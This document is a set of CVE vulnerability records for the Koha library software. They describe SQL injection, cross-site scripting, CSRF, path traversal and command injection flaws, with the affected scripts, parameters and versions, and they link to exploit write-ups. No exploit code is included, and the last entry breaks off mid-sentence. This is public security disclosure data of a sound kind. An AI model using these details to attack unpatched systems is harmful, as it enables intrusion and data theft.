The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://koha-community.org/security-release-february-2014/ | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2014/02/07/10 | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2014/02/10/3 | x_refsource_MISC | |
| http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:15.560Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-24T16:42:48",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1924",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://koha-community.org/security-release-february-2014/",
"refsource": "MISC",
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"name": "http://www.openwall.com/lists/oss-security/2014/02/07/10",
"refsource": "MISC",
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"name": "http://www.openwall.com/lists/oss-security/2014/02/10/3",
"refsource": "MISC",
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666",
"refsource": "MISC",
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1924",
"datePublished": "2020-01-24T16:42:48",
"dateReserved": "2014-02-09T00:00:00",
"dateUpdated": "2024-08-06T09:58:15.560Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-1000670 (GCVE-0-2018-1000670)
Vulnerability from cvelistv5
Published
2018-09-06 19:00
Modified
2024-09-16 16:18
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Scripting (XSS) vulnerability in Multiple fields on multiple pages including /cgi-bin/koha/acqui/supplier.pl?op=enter , /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] , /cgi-bin/koha/serials/subscription-add.pl that can result in Privilege escalation by taking control of higher privileged users browser sessions. This attack appear to be exploitable via Victims must be socially engineered to visit a vulnerable webpage containing malicious payload. This vulnerability appears to have been fixed in 17.11.
References
| ▼ | URL | Tags |
|---|---|---|
| https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:40:47.953Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"dateAssigned": "2018-09-03T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Scripting (XSS) vulnerability in Multiple fields on multiple pages including /cgi-bin/koha/acqui/supplier.pl?op=enter , /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] , /cgi-bin/koha/serials/subscription-add.pl that can result in Privilege escalation by taking control of higher privileged users browser sessions. This attack appear to be exploitable via Victims must be socially engineered to visit a vulnerable webpage containing malicious payload. This vulnerability appears to have been fixed in 17.11."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-06T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"DATE_ASSIGNED": "2018-09-03T16:07:16.980429",
"DATE_REQUESTED": "2018-08-24T17:52:47",
"ID": "CVE-2018-1000670",
"REQUESTER": "jiakyooi95@hotmail.com",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Scripting (XSS) vulnerability in Multiple fields on multiple pages including /cgi-bin/koha/acqui/supplier.pl?op=enter , /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] , /cgi-bin/koha/serials/subscription-add.pl that can result in Privilege escalation by taking control of higher privileged users browser sessions. This attack appear to be exploitable via Victims must be socially engineered to visit a vulnerable webpage containing malicious payload. This vulnerability appears to have been fixed in 17.11."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086",
"refsource": "CONFIRM",
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-1000670",
"datePublished": "2018-09-06T19:00:00Z",
"dateReserved": "2018-09-06T00:00:00Z",
"dateUpdated": "2024-09-16T16:18:56.437Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2015-4630 (GCVE-0-2015-4630)
Vulnerability from cvelistv5
Published
2018-10-18 20:00
Modified
2024-08-06 06:18
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl.
References
| ▼ | URL | Tags |
|---|---|---|
| https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html | x_refsource_MISC | |
| https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ | x_refsource_MISC | |
| https://www.exploit-db.com/exploits/37389/ | exploit, x_refsource_EXPLOIT-DB | |
| https://koha-community.org/security-release-koha-3-16-12/ | x_refsource_CONFIRM | |
| https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 | x_refsource_CONFIRM | |
| https://seclists.org/fulldisclosure/2015/Jun/80 | mailing-list, x_refsource_FULLDISC | |
| https://koha-community.org/security-release-koha-3-18-8/ | x_refsource_CONFIRM | |
| https://koha-community.org/security-release-koha-3-20-1/ | x_refsource_CONFIRM | |
| https://koha-community.org/koha-3-14-16-released/ | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T06:18:12.057Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"name": "37389",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-06-25T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-18T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"name": "37389",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-4630",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to (1) hijack the authentication of administrators for requests that create a user via a request to members/memberentry.pl or (2) give a user superlibrarian permission via a request to members/member-flags.pl or (3) hijack the authentication of arbitrary users for requests that conduct cross-site scripting (XSS) attacks via the addshelf parameter to opac-shelves.pl."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
"refsource": "MISC",
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
"refsource": "MISC",
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"name": "37389",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/37389/"
},
{
"name": "https://koha-community.org/security-release-koha-3-16-12/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423",
"refsource": "CONFIRM",
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"name": "https://koha-community.org/security-release-koha-3-18-8/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"name": "https://koha-community.org/security-release-koha-3-20-1/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"name": "https://koha-community.org/koha-3-14-16-released/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/koha-3-14-16-released/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-4630",
"datePublished": "2018-10-18T20:00:00",
"dateReserved": "2015-06-16T00:00:00",
"dateUpdated": "2024-08-06T06:18:12.057Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-1922 (GCVE-0-2014-1922)
Vulnerability from cvelistv5
Published
2020-01-24 16:42
Modified
2024-08-06 09:58
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660 | x_refsource_MISC | |
| http://koha-community.org/security-release-february-2014/ | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2014/02/07/10 | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2014/02/10/3 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:15.663Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-24T16:42:45",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1922",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660",
"refsource": "MISC",
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"name": "http://koha-community.org/security-release-february-2014/",
"refsource": "MISC",
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"name": "http://www.openwall.com/lists/oss-security/2014/02/07/10",
"refsource": "MISC",
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"name": "http://www.openwall.com/lists/oss-security/2014/02/10/3",
"refsource": "MISC",
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1922",
"datePublished": "2020-01-24T16:42:45",
"dateReserved": "2014-02-09T00:00:00",
"dateUpdated": "2024-08-06T09:58:15.663Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-30076 (GCVE-0-2025-30076)
Vulnerability from cvelistv5
Published
2025-03-16 00:00
Modified
2025-03-17 15:52
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Summary
Koha before 24.11.02 allows admins to execute arbitrary commands via shell metacharacters in the tools/scheduler.pl report parameter.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-30076",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-17T15:52:12.983540Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-17T15:52:17.570Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/gl0wyy/koha-task-scheduler-rce"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "Koha",
"vendor": "Koha",
"versions": [
{
"lessThan": "22.11.24",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "23.11.12",
"status": "affected",
"version": "23",
"versionType": "custom"
},
{
"lessThan": "24.05.07",
"status": "affected",
"version": "24",
"versionType": "custom"
},
{
"lessThan": "24.11.02",
"status": "affected",
"version": "24.06",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"versionEndExcluding": "22.11.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"versionEndExcluding": "23.11.12",
"versionStartIncluding": "23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"versionEndExcluding": "24.05.07",
"versionStartIncluding": "24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"versionEndExcluding": "24.11.02",
"versionStartIncluding": "24.06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Koha before 24.11.02 allows admins to execute arbitrary commands via shell metacharacters in the tools/scheduler.pl report parameter."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-16T02:37:40.294Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/gl0wyy/koha-task-scheduler-rce"
},
{
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=39170"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-30076",
"datePublished": "2025-03-16T00:00:00.000Z",
"dateReserved": "2025-03-16T00:00:00.000Z",
"dateUpdated": "2025-03-17T15:52:17.570Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-22954 (GCVE-0-2025-22954)
Vulnerability from cvelistv5
Published
2025-03-12 00:00
Modified
2025-03-18 13:15
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Summary
GetLateOrMissingIssues in C4/Serials.pm in Koha before 24.11.02 allows SQL Injection in /serials/lateissues-export.pl via the supplierid or serialid parameter.
References
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-22954",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-18T13:15:29.271346Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-18T13:15:54.560Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Koha",
"vendor": "Koha",
"versions": [
{
"lessThan": "24.11.02",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
"versionEndExcluding": "24.11.02",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "GetLateOrMissingIssues in C4/Serials.pm in Koha before 24.11.02 allows SQL Injection in /serials/lateissues-export.pl via the supplierid or serialid parameter."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 10,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-13T03:22:11.330Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=38829"
},
{
"url": "https://koha-community.org/koha-24-11-02-released/"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-22954",
"datePublished": "2025-03-12T00:00:00.000Z",
"dateReserved": "2025-01-09T00:00:00.000Z",
"dateUpdated": "2025-03-18T13:15:54.560Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
var-201810-0024
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl. Koha Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site 